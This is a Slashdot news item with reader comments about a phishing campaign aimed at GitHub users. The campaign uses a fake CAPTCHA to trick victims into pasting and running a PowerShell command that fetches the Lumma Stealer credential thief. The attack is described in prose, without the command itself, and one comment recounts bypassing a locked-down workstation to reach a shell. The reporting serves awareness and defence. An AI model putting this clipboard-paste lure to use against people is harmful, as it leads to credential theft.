Slashdot is powered by your submissions, so send in your scoop

 



Forgot your password?
typodupeerror
×
Windows Security

Windows PowerShell Phish Uses Fake CAPTCHA, Downloads Credential Stealer (krebsonsecurity.com) 62

"Many GitHub users this week received a novel phishing email warning of critical security holes in their code," reports Krebs on Security — citing an email shared by one of his readers: "Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue...." Clicking the "I'm not a robot" button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter "R," which opens a Windows "Run" prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the "CTRL" key and the letter "V" at the same time, which pastes malicious code from the site's virtual clipboard. Step 3 — pressing the "Enter" key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called "l6e.exe...." According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it's designed to snarf any credentials stored on the victim's PC.

Even though this might fool some users, Krebs points out that Microsoft "strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry..."

Thanks to long-time Slashdot reader sinij for sharing the article.
This discussion has been archived. No new comments can be posted.

Windows PowerShell Phish Uses Fake CAPTCHA, Downloads Credential Stealer

Comments Filter:
  • by DesertNomad ( 885798 ) on Sunday September 22, 2024 @06:33PM (#64808517)

    OMG. Here user, here's the instructions to let me hack your computer.

    • by gweihir ( 88907 )

      Being clueless comes with increased risk in life. This applies to small and big things.

      • The problem is clueless ness isn't entirely what's involved.

        Nowasays a lot of modern Captcha ask absolutely trivial tasks ("align the puzzle piece to the image") and don't rely on successful completion of the task, but on subbtle timing of the inputs.

        It would be trivial to solve the task itself in a 1-liner in Perl (or in Python for modern kids, but with more spaces), but the sudden jumps and smooth linear motion of the pointer would be going through a classifier that would notice the synthetic origin of th

    • OMG. Here user, here's the instructions to let me hack your computer.

      Well you say OMG, but the reality is this is how the vast majority of hacks occur right now. Oh look my phone is ringing Microsoft support called me about a virus on my computer, this is important, brb.

    • A darwinian attack...
    • I'm sorry, but fools who fall for this have no business being on GitHub at all.

  • ... GitHub users ...

    If you're not smart enough to recognize an 'execute' command, you're not smart enough to own a GitHub account.

    With the Linux UI now being Windows-like, does this work (assuming PowerShell for Linux is installed)?

    • by Bert64 ( 520050 )

      You wouldn't need powershell, the same thing could be achieved in bash on linux just as easily. The difference is that linux users are on average more tech savvy and wouldn't fall for it.

      What it really shows is that neither windows not linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.

      • by unrtst ( 777550 )

        What it really shows is that neither windows not linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.

        ... because you can't open a terminal on either of those??? <HINT - you can>

    • by rta ( 559125 )

      not a windows dev, but I think i fell for a joke Ctrl-W once, and almost for an Alt+F4. It's one of those things that if you haven't encountered and if it hits you when you're not paying full attention or something, i think it can get you. especially since Ctrl-V since prob many people don't even think "Ctrl-V" for paste ... they think "paste".

      Nowadays i think there should prob. be more default indication of what's in the clipboard / when the clipboard content changes. (although there is some sens

      • ... sensitivity about passwords ...

        I'd recommend Ditto [github.com] clipboard manager but it's Windows-only. It is open-source, so a Linux dev. could port it, if one wanted. ;)

        ... the android one ...

        I found so-called clipboard managers to be snippet managers / keyboard macros. That is, one has to move data in and out of a database, not re-use/replace the data in the clipboard. I am interested in an Android applet that changes the clipboard contents, similar to Ditto [sourceforge.io] (official web-page).

  • by gweihir ( 88907 ) on Sunday September 22, 2024 @06:59PM (#64808547)

    These people are not very smart, after all. That apparently some want to remove PowerShell as a "countermeasure" just makes this even more obvious.

    • by Bert64 ( 520050 )

      That's the typical clueless kneejerk response, block/remove something useful instead of learning how to use it properly.

    • The average Windows *user* yeah maybe. Average developer? Come on. Us Windows devs are experts on copy/pasting!
    • by Entrope ( 68843 )

      You laugh, but the Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users -- including both PowerShell and the more traditional command prompt, which Slashdot/Cloudflare will not let me name, as specific examples (control ISM-1491).

      • by gweihir ( 88907 )

        Well, MS Office is basically a giant scripting engine. So is basically any web-browser. I guess somebody wasted money on "experts" there.

        • by Entrope ( 68843 )

          There are a bunch of security controls in the Australian ISM about the scripting engines inside Microsoft Office and about "active content" from the web, in addition to the one I mentioned.

          When you assume, you make an ass out of yourself, at least.

      • Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users.

        I had a crappy sales job long ago with a locked down Windows NT workstation, limited icons, and permissions. I pulled up Internet Exploder and typed cmd into the address bar, much hilarity ensued. Don't know if they could have locked out the net command too, but they hadn't. The RDP used didn't like a full screen cmd window so it didn't register, probably why MS killed full screen later on. Maybe they could kill the shell but I doubt it.

  • Idiots (Score:5, Funny)

    by lsllll ( 830002 ) on Sunday September 22, 2024 @07:08PM (#64808565)

    Why was removing PowerShell even suggested? Why not just give instructions to remove the web browser and the email client? Problem solved!

  • Every system should have implemented mandatory access controls to mitigate this type of thing by now. It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.

    Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default. Executing malware on these systems is no
    • by lsllll ( 830002 ) on Sunday September 22, 2024 @07:28PM (#64808577)

      Every system should have implemented mandatory access controls to mitigate this type of thing by now.

      It's not about access control. Both Windows and Linux try to separate administrative access from user access and for those who know the difference and how to use them, they pretty much work. But you gotta realize that a user must have access to their local directory, should be able to download files, and be able to execute them. If you don't allow them to do that, then you're not going to be considered a "user-friendly" O/S.

      It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.

      If a user is dumb enough to follow instructions as introduced by this hack, they surely are going to just answer "Yes" to any prompt that pops up.

      Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default.

      I suppose that's reasonable for self-contained applications, like those on the OSes you mentiond. But on the PC we tend to run many things which fall outside of that realm. Case in point, on the PC there's an application called Minion which doesn't really have its own data, but its purpose is to supplement other applications by allowing you to download plugins for them. And that's just one of the applications I use that are on my menu bar. Treating Windows or Linux like Android and iOS really does them a disservice.

      Disclaimer: I am not a macOS user, so I really don't know how that handles this scenario.

      • by Jeremi ( 14640 )

        a user must have access to their local directory, should be able to download files, and be able to execute them.

        The problem (not only for naive users, but for all users) is how to know whether the executable they are downloading and executing will do what they expect vs something malicious?

        Sure, in a scenario like this it is easy to scoff and say that the user should have picked up on the obvious clues, but it's not difficult to imagine a scenario where the methods for convincing the user to install and execute a malicious executable are sophisticated enough to fool even the most knowledgable user. For example, one

        • by lsllll ( 830002 )

          You touched on 2 attack vectors. One is software from people you don't trust. For that, you're truly taking your chances, because you don't know if it'll take your document directory and upload it to some place. Heck, it even can be ransomware. But, in general, if it's from a place you trust, you tend to run it anyway. The solution to this is checksums, like those for various Linux distributions, and code signed by an authority you trust. The other scenario is you download something from a place you t

          • To answer the question regarding software which isn't self-contained, yes, software can have plugins and it can be rigged up to supply plugins to other software products if the developer wishes to allow it, and doing so generally won't affect the security of everything else which doesn't permit it. Also, users can access their local and network files/folders without restrictions using a file manager as GUI apps are isolated from one another.

            Regarding the trusted-but-compromised scenario, even if the deve
      • I would say that the PC is an "open" platform while iPhone is a "closed" platform, with other platforms being in various places on the scale between the two.

        The more "open" a platform is the more things a user can do with it, which opens up more risk to an uneducated user being exploited through social engineering, and there's nothing developers can do to mitigate this without compromising the openness of the platform. Either the user should move to a more limited closed platform for their own safety, givi

      • by Bert64 ( 520050 )

        should be able to download files, and be able to execute them

        On a general purpose OS aimed at geeks sure, on a consumer device no they shouldn't at least not by default.

        • You are confusing consumer device with appliance. Just because something is targeted at a consumer doesn't make it a locked down appliance.

          Imagine your car not allowing you to drive down a certain road because the destination you want to go to is not on the approved list that General Motors has defined. Consumers, non-geeks, absolutely need to be able to download, execute and install things on their PCs. It is what makes them a PC instead a kiosk.

          • by Bert64 ( 520050 )

            Regular consumers don't open the hood of their car and change the air filters, despite it being a pretty easy job, and they certainly aren't going to try changing the brake pads on their own because messing that up could easily kill them (or someone else).
            They pay someone else to do these things for them.

            Regular consumers don't buy a collection of parts and assemble their own car to their own specifications, but there is a niche of people who will absolutely do that.

            A general purpose computer is not a suita

      • by bento ( 19178 )
        Out of curiosity what is Minion and where does it come from?
  • Why would websites be allowed to put stuff into the paste buffer?

    • by CaptQuark ( 2706165 ) on Monday September 23, 2024 @01:39AM (#64808915)

      Why would websites be allowed to put stuff into the paste buffer?

      Lots of websites place helpful information in the paste buffer.
          Go to YouTube and click on the Share button. The shortened URL of the video will be placed in your copy buffer.
          Go to Programiz for tutorials. Click the Copy button and the example code will be placed in your buffer.

      Some sites disable normal copying but provide a "copy to clipboard" option, then they add their citation to the bottom of the copied text to help you give proper attribution to the source. There are other examples but this should be enough to see that not all clipboard interactions are for nefarious purposes.

      • Lots of websites place helpful information in the paste buffer.

        Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.

        • Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.

          Why not simply let the user copy this information the normal way? Hardly legit given the huge potential for abuse, and given the trend that more and more applications nowadays tend to no longer make it obvious when they have lost the selection.

          • by nazrhyn ( 906126 )
            My intuition says that the number of people who already fell for this would not be reduced significantly by the prompt saying "copy this text and paste it" ... it's already semi-insane that this worked on people who use GitHub...
    • Sigh... Ok, I see that now, and the fact that this is abuseable makes me say - as I do far too often these days - "This is why we can't have nice things".

  • Subject says it all.

  • Humans have checkbooks. Send me a check ...
  • What the fuck? I was just blocked from posting this comment [pastebin.com]... It's always nice when your cloud security makes your site unusable.

    Why have I been blocked?

    This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
    What can I do to resolve this?

    You can email the site owner to let them know you

    • Welcome to the club of the annoyed by Cloudflare.

      This is the price one pays for browsing the Sh!tternet these days, I guess ..

  • by EvilSS ( 557649 ) on Monday September 23, 2024 @08:53AM (#64809447)
    I suspect for anyone who falls for this that there actually is a pretty good chance there are security vulnerabilities in their code on github.
  • How do the bad guys always know which powershell commands work in all versions of powershell? I can't seem to ever figure out a way to ACTUALLY do anything in powershell because of how wacky it is.

Keep up the good work! But please don't ask me to help.

Working...